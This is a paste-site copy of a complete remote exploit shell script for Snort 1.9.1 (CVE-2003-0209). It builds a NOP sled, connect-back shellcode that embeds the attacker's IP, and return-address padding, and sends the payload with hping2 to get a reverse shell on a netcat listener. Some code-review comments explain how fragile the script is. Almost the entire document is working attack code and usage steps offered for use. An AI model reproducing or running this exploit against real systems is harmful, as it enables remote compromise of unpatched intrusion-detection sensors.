FlyFar

Snort 1.9.1 - 'p7snort191.sh' Remote Command Execution - CVE-2003-0209

Jan 24th, 2024
  1. #!/bin/sh
  2.  
  3. ##########################################################
  4. # p7snort191.sh by truff (truff@projet7.org)             #
  5. # Snort 1.9.1 and below remote exploit                   #
  6. #                                                        #
  7. # Tested on Slackware 8.0 with Snort 1.9.1 from sources  #
  8. #                                                        #
  9. # Usage:                                                 #
  10. # 1/ Launch a listening netcat to listen for the shell   #
  11. # nc -p 45295 -l                                         #
  12. #                                                        #
  13. # 2/ p7snort119.sh yourIP [Ret_Addr]                     #
  14. #                                                        #
  15. # Where yourIP is the IP where the netcat is listening   #
  16. # and Ret_Addr is the address (8 hexa digits) of the     #
  17. # shellcode (eg: 0819fec2)                               #
  18. #                                                        #
  19. #                                                        #
  20. # This vulnerability was discovered by Bruce Leidl,      #
  21. # Juan Pablo Martinez Kuhn, and Alejandro David Weil     #
  22. # from Core Security Technologies during Bugweek 2003.   #
  23. #                                                        #
  24. # Greetz to #root people and projet7 members.            #
  25. # Special thx to mycroft for helping me with shell       #
  26. # scripting stuff.                                       #
  27. #                                                        #
  28. # www.projet7.org - Security Researchs -                 #
  29. ##########################################################
  30.  
  31.  
  32. # Put here the path to your hping2 binary
  33. HPING2=/usr/sbin/hping2
  34.  
  35. # You should change these params to make the snort sensor
  36. # capture the packets.
  37. IPSRC=192.168.22.1
  38. IPDST=192.168.22.2
  39. PTSRC=3339
  40. PTDST=111
  41.  
  42.  
  43.  
echo "p7snort191.sh by truff (truff@projet7.org)"

# Argument handling: $1 is the connect-back IP spliced into the shellcode
# further down, $2 optionally overrides the return address RET.
# NOTE(review): neither value is validated. $1 is later split on '.' and
# handed to printf as a number, and RET is sliced into four two-character
# pairs; anything other than a dotted quad / 8 hex digits produces printf
# errors and a malformed payload instead of a clean failure.
case $# in
0)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
1)
# Hard-coded return address for the tested build (Slackware 8.0).
RET=0819fec2
echo "Using default retaddr (Slackware 8.0)"
echo $RET
;;
2)
RET=$2
echo "Using custom retaddr"
echo $RET
;;
*)
echo "Bad number of params"
echo "Read comments in sources"
exit -1
;;
esac
  68.  
  69.  
  70.  
# Nops
# 512 single-byte x86 NOPs (0x90) appended to ./egg, one `echo -e` each.
# NOTE(review): `>> egg` appends to whatever ./egg already contains and the
# file name is fixed and relative to the cwd, so a leftover file from an
# earlier or interrupted run (the `rm egg` at the end never runs if the
# script is stopped first) silently changes the payload. The 512 also
# appears in the size arithmetic below (3840 - 134 - 512); the two must
# move together.
i=0
while [ "$i" -lt "512" ]; do
i=$(expr "$i" + 1)
echo -n -e "\x90" >> egg
done
  77.  
  78.  
  79. # linux x86 shellcode by eSDee of Netric (www.netric.org)
  80. # 131 byte - connect back shellcode (port=0xb0ef)
  81. echo -n -e "\x31\xc0\x31\xdb\x31\xc9\x51\xb1" >> egg
  82. echo -n -e "\x06\x51\xb1\x01\x51\xb1\x02\x51" >> egg
  83. echo -n -e "\x89\xe1\xb3\x01\xb0\x66\xcd\x80" >> egg
  84. echo -n -e "\x89\xc2\x31\xc0\x31\xc9\x51\x51" >> egg
  85. echo -n -e "\x68" >> egg
  86.  
  87. # IP here
  88. echo -n -e $(printf "\\\x%02x" $(echo $1 | cut -d. -f1) \
  89. $(echo $1 | cut -d. -f2) \
  90. $(echo $1 | cut -d. -f3) \
  91. $(echo $1 | cut -d. -f4)) >> egg
  92.  
  93. echo -n -e "\x66\x68\xb0" >> egg
  94. echo -n -e "\xef\xb1\x02\x66\x51\x89\xe7\xb3" >> egg
  95. echo -n -e "\x10\x53\x57\x52\x89\xe1\xb3\x03" >> egg
  96. echo -n -e "\xb0\x66\xcd\x80\x31\xc9\x39\xc1" >> egg
  97. echo -n -e "\x74\x06\x31\xc0\xb0\x01\xcd\x80" >> egg
  98. echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xcd\x80" >> egg
  99. echo -n -e "\x31\xc0\xb0\x3f\x89\xd3\xb1\x01" >> egg
  100. echo -n -e "\xcd\x80\x31\xc0\xb0\x3f\x89\xd3" >> egg
  101. echo -n -e "\xb1\x02\xcd\x80\x31\xc0\x31\xd2" >> egg
  102. echo -n -e "\x50\x68\x6e\x2f\x73\x68\x68\x2f" >> egg
  103. echo -n -e "\x2f\x62\x69\x89\xe3\x50\x53\x89" >> egg
  104. echo -n -e "\xe1\xb0\x0b\xcd\x80\x31\xc0\xb0" >> egg
  105. echo -n -e "\x01\xcd\x80" >> egg
  106.  
  107. # 3 dummy bytes for alignment purposes
  108. echo -n -e "\x41\x41\x41" >> egg
  109.  
# Fill the remainder of the 0xF00 (3840) byte data area with copies of the
# return address: (3840 - 134 - 512) / 4 = 798 copies. expr truncates, so
# the file ends 2 bytes short of 3840; presumably hping2's -d pads the
# data to the requested size — not verified here.
i=0
cpt=$(expr 3840 - 134 - 512)
cpt=$(expr $cpt / 4)


# Reverse the 8 hex digits of RET pairwise (characters 7-8 first, 1-2 last)
# so the address is written in little-endian byte order for x86.
# NOTE(review): with a custom RET that is not exactly 8 hex characters the
# `cut -b` slices are empty or non-hex and printf below errors out.
var1=0x$(echo $RET | cut -b7,8)
var2=0x$(echo $RET | cut -b5,6)
var3=0x$(echo $RET | cut -b3,4)
var4=0x$(echo $RET | cut -b1,2)

while [ "$i" -lt "$cpt" ]; do
i=$(expr "$i" + 1)
# Same printf / `echo -e` trick as for the address bytes: printf emits
# literal "\xNN" text, echo -e converts it to raw bytes.
echo -n -e $(printf "\\\x%02x" $var1 $var2 $var3 $var4) >> egg
done
  124.  
  125.  
  126. # hping ruleZ
  127. $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
  128. -d 0x1 --setseq 0xffff0023 --setack 0xc0c4c014 \
  129. 1>/dev/null 2>/dev/null
  130.  
  131. $HPING2 $IPDST -a $IPSRC -s $PTSRC -p $PTDST --ack --rst -c 1 \
  132. -d 0xF00 -E egg --setseq 0xffffffff --setack 0xc0c4c014 \
  133. 1>/dev/null 2>/dev/null
  134.  
  135. $HPING2 $IPSRC -a $IPDST -s $PTDST -p $PTSRC --ack -c 1 \
  136. -d 0 --setseq 0xc0c4c014 --setack 0xffffffff \
  137. 1>/dev/null 2>/dev/null
  138.  
  139. rm egg
  140.  
  141. echo "Exploit Sended"
  142.  
  143. # milw0rm.com [2003-04-23]
  144.            